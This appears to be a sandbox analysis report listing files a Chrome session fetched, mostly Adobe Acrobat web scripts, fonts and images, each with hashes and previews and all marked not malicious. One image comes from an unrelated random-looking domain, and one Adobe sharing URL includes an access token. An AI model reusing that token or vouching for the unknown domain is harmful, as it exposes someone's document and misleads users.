                  MD5:FCC9C6E8E3D4E408DB97C05A00F4A01C
                  SHA1:239571E9C9EFADB77063FD101584FCCECE003E6F
                  SHA-256:5C2A7F96D9B1251163245C92A8033BAD9582E93F27D3C7FA9C2AA9DB63E7A8C8
                  SHA-512:1DBEEF244FAB5BF0CF03E7BF2C717E51340963D6814DF4663E2B7B8AD8CFDC3267B6AB34AC49C7A9C2259FB9E330A5D3B81EE2269F21A5C294C4901E89F84D06
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-tutorial-dropin/3.35.0_4.95.0/4260-chunk.js
                  Preview:/*! For license information please see 4260-chunk.js.LICENSE.txt */.(self["webpackJsonp-tutorial-dropin"]=self["webpackJsonp-tutorial-dropin"]||[]).push([[4260],{"9Bxo":(e,t,i)=>{"use strict";i.d(t,{n:()=>r});const o={"signed-in":{asset:"TutorialPanel/Confetti",title:"TUTORIAL_END_TITLE_EDIT_DEMO_SIGNED_IN",description:"TUTORIAL_END_DESCRIPTION_EDIT_DEMO_SIGNED_IN",action:"TRY_YOUR_OWN_FILE"},"signed-out":{asset:"TutorialPanel/Confetti",title:"TUTORIAL_END_TITLE_EDIT_DEMO_SIGNED_OUT",description:"TUTORIAL_END_DESCRIPTION_EDIT_DEMO_SIGNED_OUT",action:"START_FREE_TRIAL"}},r=[{id:"edit-organize-micro-demo-edit-text",title:"MICRO_DEMO_EDIT_TEXT_TITLE",recommendedIcon:i.p+"f5dd067e6d2bcc76b81bbad8801b179a.svg",tutorialData:{name:"edit-organize-micro-demo-edit-text","tutorial-initial-zoom":3,"tutorial-initial-scroll":0,"tutorial-end":o,"tutorial-steps":[{"tutorial-step":[{selector:'div[id="pageview-current-page"] > div > div[data-testid="overlayContainer4"] > div[class*="editOverlay"] > div:
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:RIFF (little-endian) data, Web/P image
                  Category:downloaded
                  Size (bytes):644
                  Entropy (8bit):4.6279651077789685
                  Encrypted:false
                  SSDEEP:
                  MD5:541B83C2195088043337E4353B6FD60D
                  SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                  SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                  SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/wxrssvHl2yrWrn4BIsVelZrm9HVP8qr0PAXTPCksck12130
                  Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65430), with no line terminators
                  Category:downloaded
                  Size (bytes):497483
                  Entropy (8bit):5.780984687228855
                  Encrypted:false
                  SSDEEP:
                  MD5:9D7E108152112EB261CC8BC1AFBFFE6D
                  SHA1:AF77C0DC796809796ECF6FAB8DCBCB4A2EB27BAB
                  SHA-256:4AFFEB897819DCF64DD70B3C871AA4FE153158363725A9A8EEF214BAC4C41146
                  SHA-512:DDA9F681CFD08501A72F6C5E9A623C71AD5B006852B6401AA3B567E59A1BEEB1108ABB02B888D3E8ECCAACC14710CDC816EE712BBDA5CBC15972CA0494DF1BF5
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1247.0/bootstrap.js
                  Preview:(()=>{var e,t,o,r,i={HZFE:(e,t,o)=>{"use strict";o.d(t,{Z:()=>__WEBPACK_DEFAULT_EXPORT__});var r=o("YWiy");const __WEBPACK_DEFAULT_EXPORT__=e=>t=>o=>r.createElement(t,Object.assign({},o,e))},"7iSn":(e,t,o)=>{"use strict";var r,i,n,a,s,l,c;o.d(t,{c0:()=>n,iR:()=>s,po:()=>a,zF:()=>i}),function(e){e.GDRIVE="GDrive",e.ONEDRIVE="OneDrive",e.LOCAL="Local"}(r||(r={})),function(e){e.COMPRESS_PDF="compress-pdf",e.EXPORTPDF="exportpdf",e.EXPORT_PDF="export-pdf",e.GROUP_EXPORT_PDF="export-pdf",e.CREATEPDF="createpdf",e.EXCEL_TO_PDF="excel-to-pdf",e.JPG_TO_PDF="jpg-to-pdf",e.PNG_TO_PDF="png-to-pdf",e.PPT_TO_PDF="ppt-to-pdf",e.WORD_TO_PDF="word-to-pdf",e.PDF_TO_EXCEL="pdf-to-excel",e.PDF_TO_JPG="pdf-to-jpg",e.PDF_TO_PPT="pdf-to-ppt",e.PDF_TO_WORD="pdf-to-word",e.PDF_TO_IMAGE="pdf-to-image",e.ORGANIZE_PDF="organize-pdf",e.DELETE_PAGES="delete-pages",e.ROTATE_PAGES="rotate-pages",e.REORDER_PAGES="reorder-pages",e.INSERT_PAGES="insert-pdf",e.EXTRACT_PAGES="extract-pages",e.ORGANIZE_PDF_GROUP="organize
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (18473)
                  Category:downloaded
                  Size (bytes):18525
                  Entropy (8bit):5.294626373734045
                  Encrypted:false
                  SSDEEP:
                  MD5:88AFE1A3880852B8C05FD899452E92EF
                  SHA1:75E0E8B9B18CE8D46CEA0CC298840B78F2E63F56
                  SHA-256:B8BA5CA859ABCB44819D1590815D4BF2449335BB1C0A288F731A1E7BB1C28610
                  SHA-512:1C4488FFED074F1F183126A89AB83A6CE0CC8E2A5081B56625323703771494DA4520E5D2460BEAAAAA7EC26E8C275BEFA4E62CE798370A2289F100DADE316416
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1349.0/web-first-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="f6929893-9090-416e-a231-bd78702582ee",e._sentryDebugIdIdentifier="sentry-dbid-f6929893-9090-416e-a231-bd78702582ee")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"939110932eed36816ac9d538606bc3479c9c8233"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[367],{AXyZ:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function toString(){return this.map((function(t){var r=function cssWithMappingToString(e,t){var r=e[1]||"",i=e[3];if(!i)return r;if(t&&"function"==typeof btoa){var n=function toComment(e){var t=btoa(unescape(encodeURIComponent(JSON.stringify(e)))),r="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(t);return"
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (10626)
                  Category:downloaded
                  Size (bytes):10684
                  Entropy (8bit):5.085432667618946
                  Encrypted:false
                  SSDEEP:
                  MD5:F82DCB1E1C7768CE2F2138B8257686F8
                  SHA1:5E9A099DD4DCE09AB236021AB997587190CA39EA
                  SHA-256:4C95DF00D013EA9E41ECF1A788ED0AAD740AA05E691F3DC5F9881F2150316492
                  SHA-512:FA7F022B08A16870C2BF2A34BFBFAA3B643A3ED12AB8C111D40A0E2D621527C6EFE7D04352E50BF6926A7412D1D1A1214B3DD132C4F999C32F0FC4F816D90761
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.683.0/splitpdf-provider-new.js
                  Preview:"use strict";(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[348],{H8In:e=>{var t,r="object"==typeof Reflect?Reflect:null,n=r&&"function"==typeof r.apply?r.apply:function ReflectApply(e,t,r){return Function.prototype.apply.call(e,t,r)};t=r&&"function"==typeof r.ownKeys?r.ownKeys:Object.getOwnPropertySymbols?function ReflectOwnKeys(e){return Object.getOwnPropertyNames(e).concat(Object.getOwnPropertySymbols(e))}:function ReflectOwnKeys(e){return Object.getOwnPropertyNames(e)};var i=Number.isNaN||function NumberIsNaN(e){return e!=e};function EventEmitter(){EventEmitter.init.call(this)}e.exports=EventEmitter,e.exports.once=function once(e,t){return new Promise((function(r,n){function errorListener(r){e.removeListener(t,resolver),n(r)}function resolver(){"function"==typeof e.removeListener&&e.removeListener("error",errorListener),r([].slice.call(arguments))}eventTargetAgnosticAddListener(e,t,resolver,{once:!0}),"error"!==t&&function addErrorHandlerIfEven
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65471)
                  Category:downloaded
                  Size (bytes):833976
                  Entropy (8bit):5.587299705307211
                  Encrypted:false
                  SSDEEP:
                  MD5:F7666CDE5A8A3FA175C07049B47F9CAB
                  SHA1:16D7CDA84017EEAF5E83F520971700034116F9E7
                  SHA-256:0A9A79FB8CE2A45B2F482053022429506867CCB4EB795E5FAA7D5A313F8C9F1B
                  SHA-512:4BB9FA4EF597E67ADD8689C3113FD9BF41AA753B18942B55040C194ED0E9710298C2C327BC5C9E67FDDE04866CE49005FF99D5BD0B3E038D83B2B261C8990A8F
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-core/3.71.0/dc-core.js
                  Preview:/*! For license information please see dc-core.js.LICENSE.txt */.(()=>{var a={zgAz:(a,o,i)=>{"use strict";Object.defineProperty(o,"__esModule",{value:!0}),o.AlertMedium=AlertMedium;var s=function _interopRequireDefault(a){return a&&a.__esModule?a:{default:a}}(i("GiK3"));function _extends(){return _extends=Object.assign||function(a){for(var o=1;o<arguments.length;o++){var i=arguments[o];for(var s in i)Object.prototype.hasOwnProperty.call(i,s)&&(a[s]=i[s])}return a},_extends.apply(this,arguments)}function _objectWithoutProperties(a,o){if(null==a)return{};var i,s,u=function _objectWithoutPropertiesLoose(a,o){if(null==a)return{};var i,s,u={},$=Object.keys(a);for(s=0;s<$.length;s++)i=$[s],o.indexOf(i)>=0||(u[i]=a[i]);return u}(a,o);if(Object.getOwnPropertySymbols){var $=Object.getOwnPropertySymbols(a);for(s=0;s<$.length;s++)i=$[s],o.indexOf(i)>=0||Object.prototype.propertyIsEnumerable.call(a,i)&&(u[i]=a[i])}return u}function AlertMedium(a){var o=a.scale,i=void 0===o?"M":o,u=_objectWithoutPr
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (516)
                  Category:downloaded
                  Size (bytes):3207
                  Entropy (8bit):5.211203476955634
                  Encrypted:false
                  SSDEEP:
                  MD5:1A63B46A10F24E04086FCD1F9C60BE25
                  SHA1:67A8743B8E0DD7D616489EF331EFE83685E00692
                  SHA-256:49D5E7B5A0AA6F3CCA049440A9B2053AD4AED21D4F7F9E888A7D74D9CE07662C
                  SHA-512:D5C8BAE28EAE0BB74895474F712388CCCEEDB7D1E540DE0D3FBDC79CA8894E5C5702738AA19F5AED59D0EB6C5C7DACA87B16CB94CCD1362853D4817430C989D4
                  Malicious:false
                  Reputation:unknown
                  URL:https://use.typekit.net/nil6fkt.css
                  Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/00000000000000007735dac8. * - http://typekit.com/eulas/00000000000000007735dacd. * - http://typekit.com/eulas/00000000000000007735dad8. * - http://typekit.com/eulas/00000000000000007735dadb. *. * . 2009-2025 Adobe Systems Incorporated. All Rights Reserved.. */./*{"last_published":"2024-06-12 16:35:12 UTC"}*/..@font-face {.font-family:"adobe-clean";.src:url("https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/l?primer=7fa3915bdafdf03041871920a205bef951d72bf64dd4c4460fb992e3ecc3a862&fvd=n4&v=3") format("woff2"),url("https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/d?primer=7fa3915bdafdf03041871920a205bef951d72bf64dd4c4460fb992e3ecc3a862&fvd=n4&v=3") format("woff"),u
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65469)
                  Category:downloaded
                  Size (bytes):518235
                  Entropy (8bit):5.58789632871926
                  Encrypted:false
                  SSDEEP:
                  MD5:8C62877DEB58F9F32D8CE766190479A1
                  SHA1:DAC1DA2DA9C4836243B4B183B65866E1E4AD846D
                  SHA-256:4F10A7F04EDC4B2B3B221314D90488AD762F93364E53A6DE1525971CEFC5DE41
                  SHA-512:761914A757B6E34AFB831377B66697AACC8D8C9B660CF4173FD94A185130AAFBA287E3CEAFCE8B26CFAD45DA772DBD05C558BA143DE9F69207469685F6CEF155
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-sign-dropin/3.22.0_3.427.0/bootstrap.js
                  Preview:/*! For license information please see bootstrap.js.LICENSE.txt */.(()=>{var t,r,n,a,i={iC4P:(t,r,n)=>{"use strict";r.t=function A4uAlertCircle(t){var r=_extends({},t);return a.default.createElement("svg",_extends({viewBox:"0 0 36 36"},r,r),a.default.createElement("path",{fillRule:"evenodd",d:"M18.1,2.2A15.9,15.9,0,1,0,34,18.1,15.9,15.9,0,0,0,18.1,2.2Zm0,29.812A13.912,13.912,0,1,1,32.012,18.1,13.912,13.912,0,0,1,18.1,32.012Z"}),a.default.createElement("path",{fillRule:"evenodd",d:"M15.69111,25.77237a2.26833,2.26833,0,0,1,2.23219-2.3039q.084-.00132.16781.00356a2.23208,2.23208,0,0,1,2.4,2.30034,2.18145,2.18145,0,0,1-2.4,2.23322,2.18156,2.18156,0,0,1-2.4-2.23322ZM20.125,8.79542a.41583.41583,0,0,1,.19932.36611v2.08271c0,2.80068-.56644,7.96068-.6661,8.96135,0,.09966-.03356.19933-.2339.19933H16.75789a.2214.2214,0,0,1-.2339-.19933c-.0661-.93356-.6-6.061-.6-8.86169V9.26119a.35461.35461,0,0,1,.16678-.36611,5.76552,5.76552,0,0,1,2.00034-.40067A6.5494,6.5494,0,0,1,20.125,8.79542Z"}))};var a=funct
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (51889), with no line terminators
                  Category:downloaded
                  Size (bytes):51889
                  Entropy (8bit):5.365466672277869
                  Encrypted:false
                  SSDEEP:
                  MD5:8938B522DB2E911D7D472D45D5FA0B8D
                  SHA1:751BA75CCABD1BB38B7712B114EF2EC1F8C2BFDB
                  SHA-256:795FB7E2E939491854AC8BA553AE1F408A10D5816282CA43A8BCC82396DA2FEA
                  SHA-512:088DF89FC286909ABDA911533692E69B633AC83586C0482FC5D057ADA2097D7F155EF5D485C298C9F53EE96BFC9A4F01673C37B582402053917B206B7C83587B
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/6316-b4584f83833d5100eb52.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6316],{75670:function(e,t){"use strict";var r=this&&this.__awaiter||function(e,t,r,n){return new(r||(r=Promise))((function(i,o){function s(e){try{u(n.next(e))}catch(t){o(t)}}function a(e){try{u(n.throw(e))}catch(t){o(t)}}function u(e){var t;e.done?i(e.value):(t=e.value,t instanceof r?t:new r((function(e){e(t)}))).then(s,a)}u((n=n.apply(e,t||[])).next())}))};Object.defineProperty(t,"__esModule",{value:!0}),t.exec=void 0;t.exec=(e,n=[])=>r(void 0,void 0,void 0,(function*(){if(!e||!e.length)return n;const[r,...i]=e;let o=n;try{o=yield r(n)}catch(s){}return yield(0,t.exec)(i,o)}))},89687:function(e,t,r){"use strict";t.qj=t.GL=t.YQ=void 0;var n=r(71404);Object.defineProperty(t,"YQ",{enumerable:!0,get:function(){return n.createFloodgateFeatureFlagVendor}});var i=r(44396);var o=r(75670);Object.defineProperty(t,"GL",{enumerable:!0,get:function(){return o.exec}});var s=r(12575);Object.defineProperty(t,"qj",{enumerable:!0,get:function(){re
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (5218), with no line terminators
                  Category:dropped
                  Size (bytes):5218
                  Entropy (8bit):5.182609616229545
                  Encrypted:false
                  SSDEEP:
                  MD5:C9E97A2BEA8ABCAFD8495D6EBF19E337
                  SHA1:E7982037982E9E3D7A7E221548B95B4A3F880258
                  SHA-256:34028F78C33D3FEF691C0C6ED1E0E8543B8A1CFD14C1F4C5CAF72BB189E45FEC
                  SHA-512:598F1B77345FFBB1C6E38D42C35ADA127F0740B535C81C2A0C4DC0E03A9ED1EAFDC26D79903B0660169552B40BBCE6B23761ECCDD8BEA9009FCE8CA1B84261C3
                  Malicious:false
                  Reputation:unknown
                  Preview:.SegmentationChallenger__bundleSelector__PBLTc{padding-bottom:25px;margin-top:30px}@media (max-width:1023px){.SegmentationChallenger__bundleSelector__PBLTc{padding-bottom:0}}.SegmentationChallenger__bundleWaitWrapper__LADBL .spectrum-CircleLoader.react-spectrum-Wait--centered{transform:translate(-50%,250%)}.ContentRichModal__offerName__R5Fe_{font-size:18px;font-size:var(--spectrum-global-dimension-size-225,18px);font-weight:700}.ContentRichModal__columnHeader__F8RRj{font-weight:700;margin-bottom:14px;margin-bottom:var(--spectrum-global-dimension-size-175,14px)}.ContentRichModal__inlineText__bgzTI,.ContentRichModal__inlineText__bgzTI>div{display:inline}.ContentRichModal__inlineText__bgzTI br{display:none}.ContentRichModal__offerDetailsColumn__ksZVT{flex-basis:33%}.ContentRichModal__columnUnorderedList__dVZkR{padding-left:16px;padding-left:var(--spectrum-global-dimension-size-200,16px)}.ContentRichModal__fulfillableItemsListContainer__VtHAQ{overflow-y:scroll;max-height:100vh}.Segmentatio
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1675)
                  Category:downloaded
                  Size (bytes):1745
                  Entropy (8bit):5.073188661802187
                  Encrypted:false
                  SSDEEP:
                  MD5:681A44356F46282DF2B36FB2F6E8A9FC
                  SHA1:82372CC948A8B3A9EF2CFF731D1FA820D637FDCD
                  SHA-256:B2629BD88BCAD4892C563204B88546D74FFF0C0487DF3F4A2B8BC379309AB7FC
                  SHA-512:90A0F83421F0AF4CFB30616A90CBFFD9519CF6E03126A0082CCBB8C4B78E1022F789D6178D6744E7D9BD4FA74951D3F51B6F6A7DB79E713C0442C94722BA0FED
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/genAIAssistantPanelProvider-chunk.js
                  Preview:"use strict";(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[4236],{ceiR:(t,e,s)=>{s.r(e),s.d(e,{default:()=>GenAIAssistantPanelProvider});var i=s("plsW"),n=s("PGMW"),o=s("54Fl"),r=s("abd3"),d=s("Q+Gt"),l=s("4llJ"),a=s("Xw/t"),__awaiter=function(t,e,s,i){return new(s||(s=Promise))((function(n,o){function fulfilled(t){try{step(i.next(t))}catch(t){o(t)}}function rejected(t){try{step(i.throw(t))}catch(t){o(t)}}function step(t){t.done?n(t.value):function adopt(t){return t instanceof s?t:new s((function(e){e(t)}))}(t.value).then(fulfilled,rejected)}step((i=i.apply(t,e||[])).next())}))};class GenAIAssistantPanelProvider{constructor(){this.ready=()=>(this.multidocStore=a.A.getInstance(),Promise.resolve(this)),this.getStatus=()=>({loadStatus:(0,r.toJS)((0,d.zN)(n)),isAnswerBeingProcessed:(0,r.toJS)((0,d.GZ)(n)),isMultiDocProcessing:(0,r.toJS)((0,d.F6)(n)),isSingleFileProcessing:(0,r.toJS)((0,d.K5)(n)),isAnonFreeTaste:(0,r.toJS)((0,l.qp)(n)),anonSignInShown:(0,r.toJS)((0,d.Ks
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, baseline, precision 8, 848x1200, components 3
                  Category:downloaded
                  Size (bytes):105393
                  Entropy (8bit):7.490923438107882
                  Encrypted:false
                  SSDEEP:
                  MD5:201F9531A94DE6486AFC16D623EECAD6
                  SHA1:B2FB05964C010B3D3ADDFF44F5374D8F9F6999BC
                  SHA-256:66B4199C1C4CB659BA3AC39F25E2D9CD5D7DB0C2F44EF7F38581112C5D41333A
                  SHA-512:18BC9B31FDF8E71636E8D73B014A49C22315870149C0FC0DFE79400D10CB3817F9D18DEA1B6FA2311CA1B90524628AECFBCBDA3571565B3A483E36D26D8B9052
                  Malicious:false
                  Reputation:unknown
                  URL:https://cdn-sharing.adobecc.com/rendition/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8;page=0;size=1200;type=image%2Fjpeg?access_token=1742997079_urn%3Aaaid%3Asc%3AEU%3Aed356bc9-bf5a-442b-8177-cf362f34cfc8%3Bpublic_34c9674a33f31a1472ffd85d52f528e1219cf563&api_key=dc_sendtrack
                  Preview:......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.997762c, 2025/01/14-12:18:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"> <xmpMM:DerivedFrom rdf:parseType="Resource"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65463)
                  Category:downloaded
                  Size (bytes):285720
                  Entropy (8bit):5.550900513008122
                  Encrypted:false
                  SSDEEP:
                  MD5:7C9F11553CAAD1DBDA40CD56631FFA29
                  SHA1:90C027B714B89CF7AA2CD2BEC8A6D400BF1A7358
                  SHA-256:DB6ED6ADD35659F30D1440F079C9CF5247D1F5166121B801AB2E1DAC165D4D7B
                  SHA-512:BE608AA70E746A814F722B5413C6ABD90915AF64BC9E71BF0C715ABDADA69F25F4E54BE7C260EBFE452A4CE0CC6317B9A7E1E214A168ABA9B0F72F86A4323754
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-rendition-provider/3.46.1_6.220.0/rendition.js
                  Preview:/*! For license information please see rendition.js.LICENSE.txt */.(()=>{var r,f,_={sR8A:r=>{(()=>{var f,_,S={7232:function(r,f,_){var S;!function(R,D){"use strict";var k="function",I="undefined",W="object",ie="string",ne="model",oe="name",le="type",ve="vendor",we="version",be="architecture",Pe="console",Ae="mobile",Se="tablet",Te="smarttv",De="wearable",ke="embedded",Ce="Amazon",Ie="Apple",je="ASUS",Fe="BlackBerry",Ee="Browser",Ne="Chrome",xe="Firefox",Oe="Google",Me="Huawei",Le="LG",Ue="Microsoft",ze="Motorola",qe="Opera",He="Samsung",Ge="Sharp",Je="Sony",Ve="Xiaomi",$e="Zebra",Ke="Facebook",U=function(r){for(var f={},_=0;_<r.length;_++)f[r[_].toUpperCase()]=r[_];return f},z=function(r,f){return typeof r===ie&&-1!==H(f).indexOf(H(r))},H=function(r){return r.toLowerCase()},q=function(r,f){if(typeof r===ie)return r=r.replace(/^\s\s*/,""),typeof f===I?r:r.substring(0,350)},V=function(r,f){for(var _,S,R,I,ie,ne,oe=0;oe<f.length&&!ie;){var le=f[oe],ve=f[oe+1];for(_=S=0;_<le.length&&!ie;)i
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (58027)
                  Category:downloaded
                  Size (bytes):58071
                  Entropy (8bit):5.518657795611828
                  Encrypted:false
                  SSDEEP:
                  MD5:1E2DD20469979B958057343AD0658F58
                  SHA1:AFA2B855FFAFDE6E5565B89D83556BECE6524827
                  SHA-256:8A5C363CCD9A40F399C9C183F905DF37B11D972B8A5F524653A5B1F118CEFA64
                  SHA-512:291066569C7D401F61F154ABF94EAF98A999EAEDE7C97FFEB57CBC8733DACA1BB4475245DD4B89FD6AE7F05DC444BB7720E82A0860A6C2513C4933C902E5CC9C
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-web-app-dropin/3.71.0_2.210.0/web-app.js
                  Preview:(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[187],{ihDU:(e,t,i)=>{"use strict";i.r(t),i.d(t,{default:()=>oe});var a=i("YWiy"),n=i("Zm2D"),o=i("/hLX"),r=i.n(o),s=i("plsW"),l=i("NxVT"),d=i("Qwdt"),c=i.n(d),p=i("x6CA");const ViewUtil=e=>t=>a.createElement("section",{style:{alignItems:"center",color:"#4b4b4b",display:"flex",flexDirection:"column",height:"100%",justifyContent:"center",textAlign:"center"}},a.createElement(e,t)),AccessDenied=e=>{let{dropinId:t}=e;const[i,n]=(0,a.useState)("Access denied"),[o,r]=(0,a.useState)("You do not have access to this service. Contact your IT administrator to gain access."),[s,l]=(0,a.useState)("Sign in with a different account");return(0,a.useEffect)((()=>{(0,p.i)(t,"ACCESS_DENIED").then(n).catch((()=>{})),(0,p.i)(t,"NO_ACCESS_MSG").then(r).catch((()=>{})),(0,p.i)(t,"SIGN_IN_DIFF").then(l).catch((()=>{}))}),[]),a.createElement("div",{style:{display:"flex",flexDirection:"column",gap:"13px",alignItems:"flex-start",background:"wh
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (63416)
                  Category:downloaded
                  Size (bytes):2169576
                  Entropy (8bit):6.0628093964222876
                  Encrypted:false
                  SSDEEP:
                  MD5:BB1A0F94D7BDAA555A18198B67433430
                  SHA1:0BD0366FF8474A091AD576DF1807308F355248E5
                  SHA-256:DBA8FEE3EBE5FBD274FB4B8EFD87F52AC47B65F877E305A68D2FB8022D487AA0
                  SHA-512:8007B3A4206B483DE65A6EFD9AAA6240D2A086A966E9A746FC9C65698F9323809C4757625DB0CD711B7C7B5C290BC93404CE585CC3AF7A0230DF2E82B50EAFC9
                  Malicious:false
                  Reputation:unknown
                  URL:https://ui.messaging.adobe.com/2.78.7/bundle.js
                  Preview:/*! For license information please see bundle.js.LICENSE.txt */.!function(){var e={388:function(e,t,n){"use strict";var r=n(61589),a=n(34328);t.default=void 0;var o,i,s,u=r(n(88041)),l=r(n(87308)),c=r(n(2183)),d=r(n(35100)),f=r(n(12042)),p=r(n(18060)),h=r(n(68035)),m=r(n(59001)),g=r(n(79194)),y=r(n(90068)),v=r(n(75846)),b=r(n(76973)),S=r(n(72024)),k=r(n(26467)),M=r(n(71841)),A=r(n(43979)),E=a(n(78281)),C=n(98070);n(53112),n(24649),n(90665);var T=(0,v.default)((s=i=function(e){function t(e,n){var r;return(0,f.default)(this,t),(r=(0,h.default)(this,(0,m.default)(t).call(this,e,n))).dialogId=(0,S.default)(),r}var n;return(0,g.default)(t,e),(0,p.default)(t,[{key:"_onAction",value:(n=(0,d.default)(c.default.mark((function e(t){var n,r,a,o,i=arguments;return c.default.wrap((function(e){for(;;)switch(e.prev=e.next){case 0:if(n=!0,!t){e.next=6;break}for(r=i.length,a=new Array(r>1?r-1:0),o=1;o<r;o++)a[o-1]=i[o];return e.next=5,t.apply(void 0,a);case 5:n=e.sent;case 6:!1!==n&&this.props.onClose(
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (28922)
                  Category:downloaded
                  Size (bytes):28969
                  Entropy (8bit):5.270342609266135
                  Encrypted:false
                  SSDEEP:
                  MD5:4119F93495C6F68F204B2E7C4CCA457A
                  SHA1:E9CEF17CC694FDFF5D627095DA2F50CF503B5ACF
                  SHA-256:5528488DF55B32A98B536A05E076DE42CBAFE24FF292DAE6D114A0921198BDC8
                  SHA-512:80BF90E0D7CD469E829F3715AFCDB91D2E07FA149574BEFD8DBC1C940EE8060F2AAB61D185D810847F670DFE5476964F5FE9434071DC38D40F914334E454302C
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/9842-chunk.js
                  Preview:"use strict";(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[9842],{"835Y":e=>{const{AbortController:t,AbortSignal:s}="undefined"!=typeof self?self:"undefined"!=typeof window?window:void 0;e.exports=t,e.exports.AbortSignal=s,e.exports.default=t},Qvga:(e,t,s)=>{s.d(t,{A:()=>d});s("plsW");var i=s("Uohe"),o=s("5a88"),r=s("3aG4"),n=s("QPTb"),a=s("77UE"),c=s("gmFL");function ownKeys(e,t){var s=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);t&&(i=i.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),s.push.apply(s,i)}return s}function _objectSpread(e){for(var t=1;t<arguments.length;t++){var s=null!=arguments[t]?arguments[t]:{};t%2?ownKeys(Object(s),!0).forEach((function(t){_defineProperty(e,t,s[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(s)):ownKeys(Object(s)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(s,t))}))}return
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (28278)
                  Category:downloaded
